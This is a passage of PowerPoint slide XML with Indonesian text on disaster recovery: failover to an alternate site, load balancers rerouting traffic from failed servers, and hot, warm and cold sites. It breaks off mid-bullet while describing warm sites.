            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disiapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>darurat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> failover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> online. Failover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsionalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> failover </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belakang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemrosesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> minimal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hangat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Situs yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepemilikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gedung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hangat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kumpulan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
